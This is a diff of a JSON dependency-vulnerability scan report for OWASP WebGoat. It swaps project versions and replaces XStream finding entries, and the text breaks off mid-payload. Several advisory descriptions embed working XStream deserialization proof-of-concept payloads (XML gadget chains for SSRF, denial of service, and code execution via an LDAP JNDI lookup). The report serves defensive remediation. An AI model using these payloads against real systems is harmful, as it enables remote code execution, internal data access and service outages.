                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
-                        },
-                        {
-                          "name": "org.springframework.boot:spring-boot-starter-security",
-                          "version": "3.2.11"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
-                          "name": "org.springframework.security:spring-security-web",
-                          "version": "6.2.7"
+                          "name": "com.thoughtworks.xstream:xstream",
+                          "version": "1.4.20"
                         }
                       ],
                       "is_drop": false
@@ -16494,7 +5971,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000054-0000-4000-8000-000000000054",
+              "id": "00000000-0000-0000-0000-000000000035",
               "type": "fixes"
             }
           }
@@ -16504,13 +5981,13 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. There is a vulnerability which may allow a remote attacker to request data from internal resources that are not publicly available (SSRF) only by manipulating the processed input stream. \r\n\r\n### PoC\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n      \u003ccomparator class='javafx.collections.ObservableList$1'/\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003ccom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\u003e\r\n      \u003cdataHandler\u003e\r\n        \u003cdataSource class='com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource'\u003e\r\n          \u003ccontentType\u003etext/plain\u003c/contentType\u003e\r\n          \u003cis class='java.io.SequenceInputStream'\u003e\r\n            \u003ce class='javax.swing.MultiUIDefaults$MultiUIDefaultsEnumerator'\u003e\r\n              \u003citerator class='com.sun.xml.internal.ws.util.ServiceFinder$ServiceNameIterator'\u003e\r\n                \u003cconfigs class='sun.misc.FIFOQueueEnumerator'\u003e\r\n                  \u003cqueue\u003e\r\n                    \u003clength\u003e1\u003c/length\u003e\r\n                    \u003chead\u003e\r\n                      \u003cobj class='url'\u003ehttp://localhost:8080/internal/\u003c/obj\u003e\r\n                    \u003c/head\u003e\r\n                    \u003ctail reference='../head'/\u003e\r\n                  \u003c/queue\u003e\r\n                  \u003ccursor reference='../queue/head'/\u003e\r\n                \u003c/configs\u003e\r\n                \u003creturned class='sorted-set'/\u003e\r\n              \u003c/iterator\u003e\r\n              \u003ctype\u003eKEYS\u003c/type\u003e\r\n            \u003c/e\u003e\r\n            \u003cin class='java.io.ByteArrayInputStream'\u003e\r\n              \u003cbuf\u003e\u003c/buf\u003e\r\n              \u003cpos\u003e0\u003c/pos\u003e\r\n              \u003cmark\u003e0\u003c/mark\u003e\r\n              \u003ccount\u003e0\u003c/count\u003e\r\n            \u003c/in\u003e\r\n          \u003c/is\u003e\r\n          \u003cconsumed\u003efalse\u003c/consumed\u003e\r\n        \u003c/dataSource\u003e\r\n        \u003ctransferFlavors/\u003e\r\n      \u003c/dataHandler\u003e\r\n      \u003cdataLen\u003e0\u003c/dataLen\u003e\r\n    \u003c/com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\u003e\r\n    \u003ccom.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data reference='../com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'/\u003e\r\n  \u003c/java.util.PriorityQueue\u003e\r\n\u003c/java.util.PriorityQueue\u003e\r\n```\r\n\r\n\r\nUsers who follow [the recommendation](https://x-stream.github.io/security.html#workaround) to setup XStream's security framework with a whitelist limited to the minimal required types are not affected.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n  \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n  \n\n\u003e Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n  \n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.16 or higher.\n## References\n- [GitHub Advisory](https://github.com/x-stream/xstream/security/advisories/GHSA-f6hm-88x3-mfjv)\n- [XStream Advisory](https://x-",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Arbitrary Code Execution. This vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n\r\n### PoC\r\n\r\n```\r\n\u003csorted-set\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003eysomap\u003c/type\u003e\r\n    \u003cvalue class='javax.swing.MultiUIDefaults' serialization='custom'\u003e\r\n      \u003cunserializable-parents/\u003e\r\n      \u003chashtable\u003e\r\n        \u003cdefault\u003e\r\n          \u003cloadFactor\u003e0.75\u003c/loadFactor\u003e\r\n          \u003cthreshold\u003e525\u003c/threshold\u003e\r\n        \u003c/default\u003e\r\n        \u003cint\u003e700\u003c/int\u003e\r\n        \u003cint\u003e0\u003c/int\u003e\r\n      \u003c/hashtable\u003e\r\n      \u003cjavax.swing.UIDefaults\u003e\r\n        \u003cdefault\u003e\r\n          \u003cdefaultLocale\u003ezh_CN\u003c/defaultLocale\u003e\r\n          \u003cresourceCache/\u003e\r\n        \u003c/default\u003e\r\n      \u003c/javax.swing.UIDefaults\u003e\r\n      \u003cjavax.swing.MultiUIDefaults\u003e\r\n        \u003cdefault\u003e\r\n          \u003ctables\u003e\r\n            \u003cjavax.swing.UIDefaults serialization='custom'\u003e\r\n              \u003cunserializable-parents/\u003e\r\n              \u003chashtable\u003e\r\n                \u003cdefault\u003e\r\n                  \u003cloadFactor\u003e0.75\u003c/loadFactor\u003e\r\n                  \u003cthreshold\u003e525\u003c/threshold\u003e\r\n                \u003c/default\u003e\r\n                \u003cint\u003e700\u003c/int\u003e\r\n                \u003cint\u003e1\u003c/int\u003e\r\n                \u003cstring\u003eggg\u003c/string\u003e\r\n                \u003cjavax.swing.UIDefaults_-ProxyLazyValue\u003e\r\n                  \u003cclassName\u003ejavax.naming.InitialContext\u003c/className\u003e\r\n                  \u003cmethodName\u003edoLookup\u003c/methodName\u003e\r\n                  \u003cargs\u003e\r\n                    \u003carg\u003eldap://localhost:1099/CallRemoteMethod\u003c/arg\u003e\r\n                  \u003c/args\u003e\r\n                \u003c/javax.swing.UIDefaults_-ProxyLazyValue\u003e\r\n              \u003c/hashtable\u003e\r\n              \u003cjavax.swing.UIDefaults\u003e\r\n                \u003cdefault\u003e\r\n                  \u003cdefaultLocale reference='../../../../../../../javax.swing.UIDefaults/default/defaultLocale'/\u003e\r\n                  \u003cresourceCache/\u003e\r\n                \u003c/default\u003e\r\n              \u003c/javax.swing.UIDefaults\u003e\r\n            \u003c/javax.swing.UIDefaults\u003e\r\n          \u003c/tables\u003e\r\n        \u003c/default\u003e\r\n      \u003c/javax.swing.MultiUIDefaults\u003e\r\n    \u003c/value\u003e\r\n  \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n  \u003cjavax.naming.ldap.Rdn_-RdnEntry\u003e\r\n    \u003ctype\u003eysomap\u003c/type\u003e\r\n    \u003cvalue class='com.sun.org.apache.xpath.internal.objects.XString'\u003e\r\n      \u003cm__obj class='string'\u003etest\u003c/m__obj\u003e\r\n    \u003c/value\u003e\r\n  \u003c/javax.naming.ldap.Rdn_-RdnEntry\u003e\r\n\u003c/sorted-set\u003e\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n## References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39154.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
                   "name": "com.thoughtworks.xstream:xstream",
@@ -16521,7 +5998,7 @@
             }
           ],
           "finding_type": "sca",
-          "key": "00000055-0000-4000-8000-000000000055",
+          "key": "00000000-0000-0000-0000-000000000036",
           "locations": [
             {
               "package": {
@@ -16532,18 +6009,110 @@
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "medium"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 169
-            }
-          },
-          "title": "Deserialization of Untrusted Data"
+          "problems": [
+            { "id": "GHSA-6w62-hx7r-mw68", "source": "ghsa" },
+            { "id": "CWE-434", "source": "cwe" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.18)"],
+              "created_at": "2021-08-24T08:33:14.085093Z",
+              "credits": ["ka1n4t"],
+              "cvss_base_score": 8.5,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:57:16.63116Z",
+                  "severity": "high",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:44:28.161599Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 8.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:46.574146Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 8.1,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:57.268837Z",
+                  "severity": "high",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H/E:P",
+              "disclosed_at": "2021-08-24T08:32:04Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.71511",
+                "probability": "0.00712"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569185",
+              "initially_fixed_in_versions": ["1.4.18"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:46.574146Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-08-24T15:09:24.314152Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-39154.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "https://x-stream.github.io/changes.html%231.4.18"
+                }
+              ],
+              "severity": "high",
+              "source": "snyk_vuln"
+            },
+            { "id": "CVE-2021-39154", "source": "cve" }
+          ],
+          "rating": { "severity": "high" },
+          "risk": { "risk_score": { "value": 275 } },
+          "title": "Arbitrary Code Execution"
         },
-        "id": "00000055-0000-4000-8000-000000000055",
+        "id": "00000000-0000-0000-0000-000000000036",
         "links": {},
         "relationships": {
           "fix": {
@@ -16557,11 +6126,11 @@
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
                           "name": "com.thoughtworks.xstream:xstream",
-                          "version": "1.4.16"
+                          "version": "1.4.18"
                         }
                       ],
                       "is_drop": false
@@ -16570,7 +6139,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000055-0000-4000-8000-000000000055",
+              "id": "00000000-0000-0000-0000-000000000036",
               "type": "fixes"
             }
           }
@@ -16580,68 +6149,13 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "Multiple licenses: EPL-1.0, GPL-2.0, LGPL-2.1",
-          "evidence": [
-            {
-              "path": [
-                {
-                  "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
-                },
-                {
-                  "name": "org.asciidoctor:asciidoctorj",
-                  "version": "2.5.10"
-                },
-                {
-                  "name": "org.jruby:jruby",
-                  "version": "9.4.3.0"
-                },
-                {
-                  "name": "org.jruby:jruby-base",
-                  "version": "9.4.3.0"
-                },
-                {
-                  "name": "com.github.jnr:jnr-posix",
-                  "version": "3.1.17"
-                }
-              ],
-              "source": "dependency_path"
-            }
-          ],
-          "finding_type": "sca",
-          "key": "00000056-0000-4000-8000-000000000056",
-          "locations": [
-            {
-              "package": {
-                "name": "com.github.jnr:jnr-posix",
-                "version": "3.1.17"
-              },
-              "type": "package"
-            }
-          ],
-          "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {},
-          "title": "Multiple licenses: EPL-1.0, GPL-2.0, LGPL-2.1"
-        },
-        "id": "00000056-0000-4000-8000-000000000056",
-        "links": {},
-        "relationships": {},
-        "type": "findings"
-      },
-      {
-        "attributes": {
-          "cause_of_failure": false,
-          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). This vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.\r\n\r\n### PoC\r\n\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003cdynamic-proxy\u003e\r\n      \u003cinterface\u003ejava.lang.Comparable\u003c/interface\u003e\r\n      \u003chandler class='com.sun.xml.internal.ws.client.sei.SEIStub'\u003e\r\n        \u003cowner/\u003e\r\n        \u003cmanagedObjectManagerClosed\u003efalse\u003c/managedObjectManagerClosed\u003e\r\n        \u003cdatabinding class='com.sun.xml.internal.ws.db.DatabindingImpl'\u003e\r\n          \u003cstubHandlers\u003e\r\n            \u003centry\u003e\r\n              \u003cmethod\u003e\r\n                \u003cclass\u003ejava.lang.Comparable\u003c/class\u003e\r\n                \u003cname\u003ecompareTo\u003c/name\u003e\r\n                \u003cparameter-types\u003e\r\n                  \u003cclass\u003ejava.lang.Object\u003c/class\u003e\r\n                \u003c/parameter-types\u003e\r\n              \u003c/method\u003e\r\n              \u003ccom.sun.xml.internal.ws.client.sei.StubHandler\u003e\r\n                \u003cbodyBuilder class='com.sun.xml.internal.ws.client.sei.BodyBuilder$DocLit'\u003e\r\n                  \u003cindices\u003e\r\n                    \u003cint\u003e0\u003c/int\u003e\r\n                  \u003c/indices\u003e\r\n                  \u003cgetters\u003e\r\n                    \u003ccom.sun.xml.internal.ws.client.sei.ValueGetter\u003ePLAIN\u003c/com.sun.xml.internal.ws.client.sei.ValueGetter\u003e\r\n                  \u003c/getters\u003e\r\n                  \u003caccessors\u003e\r\n                    \u003ccom.sun.xml.internal.ws.spi.db.JAXBWrapperAccessor_-2\u003e\r\n                      \u003cval_-isJAXBElement\u003efalse\u003c/val_-isJAXBElement\u003e\r\n                      \u003cval_-getter class='com.sun.xml.internal.ws.spi.db.FieldGetter'\u003e\r\n                        \u003ctype\u003eint\u003c/type\u003e\r\n                        \u003cfield\u003e\r\n                          \u003cname\u003ehash\u003c/name\u003e\r\n                          \u003cclazz\u003ejava.lang.String\u003c/clazz\u003e\r\n                        \u003c/field\u003e\r\n                      \u003c/val_-getter\u003e\r\n                      \u003cval_-isListType\u003efalse\u003c/val_-isListType\u003e\r\n                      \u003cval_-n\u003e\r\n                        \u003cnamespaceURI/\u003e\r\n                        \u003clocalPart\u003ehash\u003c/localPart\u003e\r\n                        \u003cprefix/\u003e\r\n                      \u003c/val_-n\u003e\r\n                      \u003cval_-setter class='com.sun.xml.internal.ws.spi.db.MethodSetter'\u003e\r\n                        \u003ctype\u003ejava.lang.String\u003c/type\u003e\r\n                        \u003cmethod\u003e\r\n                          \u003cclass\u003ejdk.nashorn.internal.runtime.Source\u003c/class\u003e\r\n                          \u003cname\u003ereadFully\u003c/name\u003e\r\n                          \u003cparameter-types\u003e\r\n                            \u003cclass\u003ejava.net.URL\u003c/class\u003e\r\n                          \u003c/parameter-types\u003e\r\n                        \u003c/method\u003e\r\n                      \u003c/val_-setter\u003e\r\n                      \u003couter-class\u003e\r\n                        \u003cpropertySetters\u003e\r\n                          \u003centry\u003e\r\n                            \u003cstring\u003eserialPersistentFields\u003c/string\u003e\r\n                            \u003ccom.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                              \u003ctype\u003e[Ljava.io.ObjectStreamField;\u003c/type\u003e\r\n                              \u003cfield\u003e\r\n                                \u003cname\u003eserialPersistentFields\u003c/name\u003e\r\n                                \u003cclazz\u003ejava.lang.String\u003c/clazz\u003e\r\n                              \u003c/field\u003e\r\n                            \u003c/com.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                          \u003c/entry\u003e\r\n                          \u003centry\u003e\r\n                            \u003cstring\u003eCASE_INSENSITIVE_ORDER\u003c/string\u003e\r\n                            \u003ccom.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                              \u003ctype\u003ejava.util.Comparator\u003c/type\u003e\r\n                              \u003cfield\u003e\r\n                                \u003cname\u003eCASE_INSENSITIVE_ORDER\u003c/name\u003e\r\n                                \u003cclazz\u003ejava.lang.String\u003c/clazz\u003e\r\n                              \u003c/field\u003e\r\n                            \u003c/com.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                          \u003c/entry\u003e\r\n                          \u003centry\u003e\r\n                            \u003cstring\u003eserialVersionUID\u003c/string\u003e\r\n                            \u003ccom.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                              \u003ctype\u003elong\u003c/type\u003e\r\n                              \u003cfield\u003e\r\n                                \u003cname\u003eserialVersionUID\u003c/name\u003e\r\n                                \u003cclazz\u003ejava.lang.String\u003c/clazz\u003e\r\n                              \u003c/field\u003e\r\n                            \u003c/com.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                          \u003c/entry\u003e\r\n                          \u003centry\u003e\r\n                            \u003cstring\u003evalue\u003c/string\u003e\r\n                            \u003ccom.sun.xml.internal.ws.spi.db.FieldSetter\u003e\r\n                              \u003ctype\u003e[C\u003c/type\u003e\r\n                       ",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Denial of Service (DoS). This vulnerability may allow a remote attacker to allocate 100% CPU time on the target system depending on CPU type or parallel execution of such a payload resulting in a denial of service only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose.\r\n\r\n### PoC\r\n\r\n```\r\n\u003clinked-hash-set\u003e\r\n  \u003csun.reflect.annotation.AnnotationInvocationHandler serialization='custom'\u003e\r\n    \u003csun.reflect.annotation.AnnotationInvocationHandler\u003e\r\n      \u003cdefault\u003e\r\n        \u003cmemberValues class='javax.script.SimpleBindings'\u003e\r\n          \u003cmap class='javax.script.SimpleBindings' reference='..'/\u003e\r\n        \u003c/memberValues\u003e\r\n        \u003ctype\u003ejavax.xml.transform.Templates\u003c/type\u003e\r\n      \u003c/default\u003e\r\n    \u003c/sun.reflect.annotation.AnnotationInvocationHandler\u003e\r\n  \u003c/sun.reflect.annotation.AnnotationInvocationHandler\u003e\r\n\u003c/linked-hash-set\u003e\r\n```\r\n\r\n```\r\nXStream xstream = new XStream();\r\nxstream.fromXML(xml);\r\n```\n\n## Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](https://security.snyk.io/vuln/SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example,  [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n## Remediation\nUpgrade `com.thoughtworks.xstream:xstream` to version 1.4.18 or higher.\n## References\n- [XStream Advisory](https://x-stream.github.io/CVE-2021-39140.html)\n- [XStream Changelog](https://x-stream.github.io/changes.html#1.4.18)\n",
           "evidence": [
             {
               "path": [
                 {
                   "name": "org.owasp.webgoat:webgoat",
-                  "version": "2023.5-SNAPSHOT"
+                  "version": "2025.4-SNAPSHOT"
                 },
                 {
                   "name": "com.thoughtworks.xstream:xstream",
@@ -16652,7 +6166,7 @@
             }
           ],
           "finding_type": "sca",
-          "key": "00000057-0000-4000-8000-000000000057",
+          "key": "00000000-0000-0000-0000-000000000037",
           "locations": [
             {
               "package": {
@@ -16663,18 +6177,110 @@
             }
           ],
           "policy_modifications": [],
-          "problems": null,
-          "rating": {
-            "severity": "high"
-          },
-          "risk": {
-            "risk_score": {
-              "value": 279
+          "problems": [
+            { "id": "CWE-502", "source": "cwe" },
+            { "id": "CVE-2021-39140", "source": "cve" },
+            { "id": "GHSA-6wf9-jmg9-vxcc", "source": "ghsa" },
+            {
+              "affected_hash_ranges": [],
+              "affected_hashes": [],
+              "affected_versions": ["[,1.4.18)"],
+              "created_at": "2021-08-24T08:42:23.26187Z",
+              "credits": ["Lai Han"],
+              "cvss_base_score": 6.5,
+              "cvss_sources": [
+                {
+                  "assigner": "Snyk",
+                  "base_score": 6.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-06T13:58:19.377431Z",
+                  "severity": "medium",
+                  "type": "primary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P"
+                },
+                {
+                  "assigner": "NVD",
+                  "base_score": 6.3,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:48:12.803673Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "Red Hat",
+                  "base_score": 6.5,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:53:46.704908Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
+                },
+                {
+                  "assigner": "SUSE",
+                  "base_score": 5.9,
+                  "cvss_version": "3.1",
+                  "modified_at": "2024-03-11T09:49:57.253801Z",
+                  "severity": "medium",
+                  "type": "secondary",
+                  "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
+                }
+              ],
+              "cvss_vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H/E:P",
+              "disclosed_at": "2021-08-24T08:41:01Z",
+              "ecosystem": {
+                "language": "java",
+                "package_manager": "maven",
+                "type": "build"
+              },
+              "epss_details": {
+                "model_version": "v2025.03.14",
+                "percentile": "0.10906",
+                "probability": "0.00038"
+              },
+              "exploit_details": {
+                "maturity_levels": [
+                  {
+                    "format": "CVSSv3",
+                    "level": "proof of concept",
+                    "type": "secondary"
+                  },
+                  {
+                    "format": "CVSSv4",
+                    "level": "proof of concept",
+                    "type": "primary"
+                  }
+                ],
+                "sources": ["Snyk"]
+              },
+              "id": "SNYK-JAVA-COMTHOUGHTWORKSXSTREAM-1569189",
+              "initially_fixed_in_versions": ["1.4.18"],
+              "is_fixable": true,
+              "is_malicious": false,
+              "is_social_media_trending": false,
+              "modified_at": "2024-03-11T09:53:46.704908Z",
+              "package_name": "com.thoughtworks.xstream:xstream",
+              "package_version": "",
+              "published_at": "2021-08-24T15:09:23.599216Z",
+              "references": [
+                {
+                  "title": "XStream Advisory",
+                  "url": "https://x-stream.github.io/CVE-2021-39140.html"
+                },
+                {
+                  "title": "XStream Changelog",
+                  "url": "https://x-stream.github.io/changes.html%231.4.18"
+                }
+              ],
+              "severity": "medium",
+              "source": "snyk_vuln"
             }
-          },
-          "title": "Server-Side Request Forgery (SSRF)"
+          ],
+          "rating": { "severity": "medium" },
+          "risk": { "risk_score": { "value": 180 } },
+          "title": "Denial of Service (DoS)"
         },
-        "id": "00000057-0000-4000-8000-000000000057",
+        "id": "00000000-0000-0000-0000-000000000037",
         "links": {},
         "relationships": {
           "fix": {
@@ -16688,7 +6294,7 @@
                       "dependency_path": [
                         {
                           "name": "org.owasp.webgoat:webgoat",
-                          "version": "2023.5-SNAPSHOT"
+                          "version": "2025.4-SNAPSHOT"
                         },
                         {
                           "name": "com.thoughtworks.xstream:xstream",
@@ -16701,7 +6307,7 @@
                 },
                 "outcome": "fully_resolved"
               },
-              "id": "00000057-0000-4000-8000-000000000057",
+              "id": "00000000-0000-0000-0000-000000000037",
               "type": "fixes"
             }
           }
@@ -16711,50 +6317,138 @@
       {
         "attributes": {
           "cause_of_failure": false,
-          "description": "## Overview\n[org.springframework:spring-web](https://github.com/spring-projects/spring-framework) is a package that provides a comprehensive programming and configuration model for modern Java-based enterprise applications - on any kind of deployment platform.\n\nAffected versions of this package are vulnerable to Open Redirect when `UriComponentsBuilder` parses an externally provided URL, and the application subsequently uses that URL. If it contains hierarchical components such as path, query, and fragment it may evade validation.\n## Remediation\nUpgrade `org.springframework:spring-web` to version 5.3.32, 6.0.17, 6.1.4 or higher.\n## References\n- [GitHub Commit](https://github.com/spring-projects/spring-framework/commit/120ea0a51c63171e624ca55dbd7cae627d53a042)\n- [PoC](https://github.com/SeanPesce/CVE-2024-22243)\n- [Spring Advisory](https://spring.io/security/cve-2024-22243)\n",
+          "description": "## Overview\n[com.thoughtworks.xstream:xstream](https://x-stream.github.io/) is a simple library to serialize objects to XML and back again.\n\nAffected versions of this package are vulnerable to Server-Side Request Forgery (SSRF). This vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream with a Java runtime version 14 to 8. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types.\r\n\r\n### PoC\r\n\r\n```\r\n\u003cjava.util.PriorityQueue serialization='custom'\u003e\r\n  \u003cunserializable-parents/\u003e\r\n  \u003cjava.util.PriorityQueue\u003e\r\n    \u003cdefault\u003e\r\n      \u003csize\u003e2\u003c/size\u003e\r\n    \u003c/default\u003e\r\n    \u003cint\u003e3\u003c/int\u003e\r\n    \u003cdynamic-proxy\u003e\r\n      \u003cinterface\u003ejava.lang.Comparable\u003c/interface\u003e\r\n      \u003chandler class='com.sun.xml.internal.ws.client.sei.SEIStub'\u003e\r\n        \u003cowner/\u003e\r\n        \u003cmanagedObjectManagerClosed\u003efalse\u003c/managedObjectManagerClosed\u003e\r\n        \u003cdatabinding class='com.sun.xml.internal.ws.db.DatabindingImpl'\u003e\r\n          \u003cstubHandlers\u003e\r\n            \u003centry\u003e\r\n              